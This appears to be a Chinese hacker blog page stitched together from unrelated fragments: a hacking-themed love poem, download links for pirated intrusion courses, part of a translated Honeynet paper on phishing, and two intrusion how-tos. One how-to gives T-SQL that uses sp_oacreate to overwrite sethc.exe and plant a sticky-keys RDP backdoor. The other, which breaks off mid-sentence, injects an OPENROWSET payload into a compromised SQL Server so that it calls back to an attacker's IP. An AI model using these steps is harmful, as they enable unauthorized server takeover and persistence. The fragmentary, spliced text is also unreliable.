新BLOG

不用免费的了，郁闷~

 

Hack技术学的再好, 却无法入侵你的心,

服务器入侵的再多,对你只有Guest,

是我的DDos造成了你的拒绝服务?

还是我的ByShell再次被你查杀?

你总有防火墙,我始终停不掉,想提权,

无奈!!!

JSP+MYSQL成为我们的障碍,

找不到你的注入点,扫不到你的空口令.

所有对我的回应都用3DES加密,

你总是自定文件格式,

我永远找不到你的入口点,

忽略所有异常,

却还是跟踪不到你的注册码,

虽然我们是不同的对象,都有隐私的一面,

但我相信总有一天我会找到你的接口,把我的最真给你看!

因为我是你的指针,在茫茫内存的堆栈中,永远指向你那片天空,不孜不倦!

我愿做你的内联,供你无限次的调用,直到海枯石烂!

我愿做你的引用,和你同进退共生死,一起经受考验!

只是我不愿苦苦地调试你的心情,最终沦为你的友元!

如今我们已被MFC封装--事事变迁!

如今我们已向COM走去--可想当年!

Hack技术学的再好, 却无法入侵你的心,

如果你像神话一样那么我就是传说中里面的那个神.

 

 

 

 

有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法 （很多服务器都把'wscript.shell'给删了。） 看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject 网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。 上网找了些资料，得到下面方法： 复制文件： declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe'; declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 成功后3389登陆按五次shift键。成功进入服务器。一直向上点"我的电脑"右键"管理" 用户管理直接加用户。 此法随无技术可言，希望对某些人有点用。

 

－－－－－－－－－－－－－－－－－以下为PHP相关－－－－－－－－－－－－－－
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/PHP配置.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/PHP注射part1.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/PHP注射part2.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/PHP注射part3.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/PHP注射part4.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/tool.rar

－－－－－－－－－－－－－－－－－以下为ACCESS相关－－－－－－－－－－－－－－－－－－
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/ACCESS注射part1.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/ACCESS注射part2.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/ACCESS注射part3.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/ACCESS注射概述.rar

－－－－－－－－－－－－－－－－－－以下为ASP相关－－－－－－－－－－－－－－－－－－－－
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/ASP脚本安全4.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/ASP脚本安全5.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/ASP脚本安全6.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/ASP脚本安全7.rar

－－－－－－－－－－－－－－－以下为脚本入侵的基础知识讲解－－－－－－－－－－－－－－－－－－
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训 高级脚本入侵班/脚本基础1.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训

 网路钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件，意图引诱收信人给出敏感资讯（如用户名、口令、帐号ID、ATM PIN码或信用卡详细资讯）的一种攻击方式。最典型的网路钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上，并获取收信人在此网站上输入的个人敏感资讯，通常这个攻击过程不会让受害者警觉。这些个人资讯对骇客们具有非常大的吸引力，因为这些资讯使得他们可以假冒受害者进行欺诈性金融交易，从而获得经济利益。受害者经常遭受显著的经济损失或全部个人资讯被窃取并用于犯罪的目的。这篇“了解你的敌人”文章旨在基于德国蜜网项目组和英国蜜网专案组所搜集到的攻击资料给出网路钓鱼攻击的一些实际案例分析。这篇文章关注由蜜网专案组在实际环境中发现的真实存在的网路钓鱼攻击案例，但不会覆狸狾野i能存在的网路钓鱼攻击方法和技术。攻击者也在不断地进行技术创新和发展，目前也应该有新的网路钓鱼技术已经在开发中，甚至使用中。

在给出一个简要的引言和背景介绍后，我们将回顾钓鱼者实际使用的技术和工具，给出使用蜜网技术捕获真实世界中的网路钓鱼攻击的三个实验型研究的案例。这些攻击案例将详细地进行描述，包括系统入侵、钓鱼网站架设、消息传播和资料收集等阶段。随后，将对其中普遍应用的技术及网路钓鱼、垃圾邮件和僵尸网路等技术进行融合的趋势给出分析。钓鱼者使用恶意软体进行自动化的Email位址收集和垃圾邮件发送的案例也将被回顾，同时我们也将展示我们在网路扫描技术及被攻陷主机如何被用于传播钓鱼邮件和其他垃圾邮件上的发现。最后，我们对本文给出结论，包括我们在最近6个月内获得的经验，以及我们建议的进一步研究的客体。

这篇文章包括了丰富的支援性资讯，提供了包含特定的网路钓鱼攻击案例更详细资料的链结。最后声明一下，在研究过程中，我们没有收集任何机密性的个人资料。在一些案例中，我们与被涉及网路钓鱼攻击的组织进行了直接联系，或者将这些攻击相关的资料转交给当地的应急回应组织。

引言

欺骗别人给出口令或其他敏感资讯的方法在骇客界已经有一个悠久的历史。传统上，这种行为一般以社交工程的方式进行。在二十世纪九十年代，随着互联网所连接的主机系统和用户量的飞速增长，攻击者开始将这个过程自动化，从而攻击数量巨大的互联网用户群体。最早系统性地对这种攻击行为进行的研究工作在199

 由于工作原因，疏于管理肉鸡，用了许久的VPN肉鸡飞了......米办法，因为上一些国外站点需要用VPN，只能再去找几台做VPN用用了。于是找GOOGLE帮忙，搜了下。不一会就找到了个有注入且为SA权限的肉鸡，心想，今天运气不错嘛。一找就给我了个SA。可能有些朋友看到这边，或许该起哄了，都SA了，这还好意思写文章出来，这类文章多的跟米一样，不差我这篇吧。呵呵，如果是一般的情况，我也不会厚脸皮写出来了。请耐心继续往下看,从中你可以学到xp_makecab，xp_unpackcab, xp_regread, sp_configure等扩展存储的使用。
OK，我先说下这台BT肉鸡的大概情况。
2K+MSSQL2000+IIS
对外开放80，1433，3389端口,且此服务器上只放该站一个站点，而且后台密码是写在ASP文件里的（前面猜表时并未找到后台相关的表，于是猜测对方是把密码写在ASP文件里了，进去后肯定了我的猜测）。
网络上公认的危险存储扩展均被删除,且无法恢复。
(后来确认是 odsole70.dll，xplog70.dll,xpstar.dll三个DLL被删除)
这三个DLL的删除，意味着N多的存储扩展用不了了。也就意味着，虽然是SA权限，但你却不能执行命令，不能列目录，不能读改注册表，不能恢复被删除的存储扩展。
OK，大体情况已经说了，难度系数是有D，看我是如何击破这坚固的堡垒的。
虽然对方开放了1433端口，但是这并不代表着WEB和数据库就肯定是在一快的。曾经就碰过这类的机器，虽然开着MSSQL服务，但是却是给别的WEB机器提供的。节省资源，又相对安全。于是我先在本地用NC监听80端口(反连看IP，自己机器并不一定要有装MSSQL的)，在注射点上注射如下语句：
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=111.111.111.111,80;', 'select * from dest_table') select * from src_table;--
因为我们只要看IP，所以其他的参数就无所谓了。而端口设置成80，是为了预防一些机器只让访问外部80。
没一会，就有机器连过来了，一看IP。嘿嘿，正是目标机器。如图1

于是大胆进行下一步计划--获取WEBSHELL。
要获取WEBSHELL，首先我们得需要路径，如何去获取路径呢？由于许多存储扩展已经不能使用，我们没办法执行命令，列目录，查看注册表等操作。于是，我脑

 

 喜欢的一起来听听！